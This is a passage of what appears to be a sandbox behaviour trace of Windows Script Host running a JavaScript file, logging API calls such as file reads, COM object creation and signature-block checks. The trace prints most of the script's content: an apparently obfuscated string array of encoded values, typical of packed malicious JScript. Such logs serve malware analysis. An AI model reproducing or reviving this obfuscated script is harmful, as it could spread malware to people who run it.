cKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0110.435] UnmapViewOfFile (lpBaseAddress=0x210000) returned 1
	[0110.436] CloseHandle (hObject=0x114) returned 1
	[0110.436] CloseHandle (hObject=0x110) returned 1
	[0110.436] GetSystemDirectoryA (in: lpBuffer=0x14edf8, uSize=0x0 | out: lpBuffer="<ò\x14") returned 0x14
	[0110.436] ??2@YAPEAX_K@Z () returned 0x5574d0
	[0110.436] GetSystemDirectoryA (in: lpBuffer=0x5574d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0110.436] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0110.436] ??3@YAXPEAX@Z () returned 0x46511f01
	[0110.436] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0110.436] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0110.436] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0110.436] IdentifyCodeAuthzLevelW () returned 0x1
	[0110.939] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14df70 | out: lpSystemTimeAsFileTime=0x14df70*(dwLowDateTime=0xba614b70, dwHighDateTime=0x1d543d1)) 
	[0110.939] GetCurrentProcessId () returned 0x6a8
	[0110.939] GetCurrentThreadId () returned 0x794
	[0110.939] GetTickCount () returned 0x2c2a2
	[0110.939] QueryPerformanceCounter (in: lpPerformanceCount=0x14df78 | out: lpPerformanceCount=0x14df78*=23536533608) returned 1
	[0110.939] malloc (_Size=0x100) returned 0x557b60
	[0110.940] GetVersionExA (in: lpVersionInformation=0x14dd50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x14dd50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0110.940] GetUserDefaultLCID () returned 0x409
	[0110.940] IsFileSupportedName () returned 0x1
	[0110.940] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0110.940] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0110.940] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0110.944] GetSignedDataMsg () returned 0x0
	[0110.944] GetCurrentProcess () returned 0xffffffffffffffff
	[0110.944] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14e5b0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x14e5b0*=0x140) returned 1
	[0110.944] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0110.944] ??2@YAPEAX_K@Z () returned 0x559f30
	[0110.944] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0110.944] ReadFile (in: hFile=0x140, lpBuffer=0x559f30, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x14e590, lpOverlapped=0x0 | out: lpBuffer=0x559f30*, lpNumberOfBytesRead=0x14e590*=0x4b68, lpOverlapped=0x0) returned 1
	[0110.944] CoInitialize (pvReserved=0x0) returned 0x1
	[0110.944] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x14e500 | out: ppv=0x14e500*=0x55ef00) returned 0x0
	[0110.948] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14c700 | out: lpSystemTimeAsFileTime=0x14c700*(dwLowDateTime=0xba614b70, dwHighDateTime=0x1d543d1)) 
	[0110.948] GetCurrentProcessId () returned 0x6a8
	[0110.948] GetCurrentThreadId () returned 0x794
	[0110.948] GetTickCount () returned 0x2c2a2
	[0110.948] QueryPerformanceCounter (in: lpPerformanceCount=0x14c708 | out: lpPerformanceCount=0x14c708*=23537400291) returned 1
	[0110.948] malloc (_Size=0x100) returned 0x557c70
	[0110.948] __dllonexit () returned 0x7fedf7914c0
	[0110.948] __dllonexit () returned 0x7fedf7914e8
	[0110.948] GetVersionExA (in: lpVersionInformation=0x14c4e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xdf792dc9, dwBuildNumber=0x7fe, dwPlatformId=0xdf7914e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x14c4e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0110.948] GetProcessWindowStation () returned 0x30
	[0110.948] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x14c4c8, nLength=0xc, lpnLengthNeeded=0x14c4c0 | out: pvInfo=0x14c4c8, lpnLengthNeeded=0x14c4c0) returned 1
	[0110.948] ??2@YAPEAX_K@Z () returned 0x55eaa0
	[0110.948] ??2@YAPEAX_K@Z () returned 0x55eaf0
	[0110.948] ??2@YAPEAX_K@Z () returned 0x55eb20
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55eb60
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55eba0
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55ebe0
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55ec20
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55ec60
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55eca0
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55ece0
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55ed20
	[0110.949] ??3@YAXPEAX@Z () returned 0x46511f01
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55ed70
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55edb0
	[0110.949] DllGetClassObject (in: rclsid=0x29e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14d1d0 | out: ppv=0x14d1d0*=0x55eaf0) returned 0x0
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55eaf0
	[0110.949] IClassFactory:CreateInstance (in: This=0x55eaf0, pUnkOuter=0x0, riid=0x14dfb0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x14d1f0 | out: ppvObject=0x14d1f0*=0x55ef00) returned 0x0
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55edf0
	[0110.949] GetSystemInfo (in: lpSystemInfo=0x14d030 | out: lpSystemInfo=0x14d030*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0110.949] VirtualQuery (in: lpAddress=0x14d0a0, lpBuffer=0x14d060, dwLength=0x30 | out: lpBuffer=0x14d060*(BaseAddress=0x14d000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55ee30
	[0110.949] ??2@YAPEAX_K@Z () returned 0x55ee50
	[0110.950] ??2@YAPEAX_K@Z () returned 0x55eeb0
	[0110.950] ??2@YAPEAX_K@Z () returned 0x55eee0
	[0110.950] ??2@YAPEAX_K@Z () returned 0x55ef90
	[0110.950] IUnknown:AddRef (This=0x55ef00) returned 0x2
	[0110.950] IUnknown:Release (This=0x55ef00) returned 0x1
	[0110.950] IUnknown:Release (This=0x55eaf0) returned 0x0
	[0110.950] ??3@YAXPEAX@Z () returned 0x46511f01
	[0110.950] IUnknown:QueryInterface (in: This=0x55ef00, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x14e438 | out: ppvObject=0x14e438*=0x55ef00) returned 0x0
	[0110.950] IUnknown:Release (This=0x55ef00) returned 0x1
	[0110.950] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0110.950] IsTextUnicode (in: lpv=0x559f30, iSize=19304, lpiResult=0x14e488 | out: lpiResult=0x14e488) returned 0
	[0110.950] GetACP () returned 0x4e4
	[0110.950] malloc (_Size=0x97d0) returned 0x36dfd0
	[0110.950] GetACP () returned 0x4e4
	[0110.950] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x559f30, cbMultiByte=19304, lpWideCharStr=0x36dfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0110.951] realloc (_Block=0x36dfd0, _Size=0x96d0) returned 0x36dfd0
	[0110.951] ??2@YAPEAX_K@Z () returned 0x55eaf0
	[0110.952] free (_Block=0x36dfd0) 
	[0110.952] ??3@YAXPEAX@Z () returned 0x46511f01
	[0110.952] ??3@YAXPEAX@Z () returned 0x46511f01
	[0110.952] ??3@YAXPEAX@Z () returned 0x46511f01
	[0110.952] ??3@YAXPEAX@Z () returned 0x46511f01
	[0110.952] ??3@YAXPEAX@Z () returned 0x46511f01
	[0110.952] ??3@YAXPEAX@Z () returned 0x46511f01
	[0110.952] CoUninitialize () 
	[0110.952] ??3@YAXPEAX@Z () returned 0x46511f01
	[0110.952] CloseHandle (hObject=0x140) returned 1
	[0110.952] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0110.952] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0110.952] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0110.952] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0110.952] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0110.952] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0110.952] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0110.952] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0110.952] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0110.952] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0110.952] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0110.952] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0110.952] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0110.952] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0110.952] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0110.952] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0110.952] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
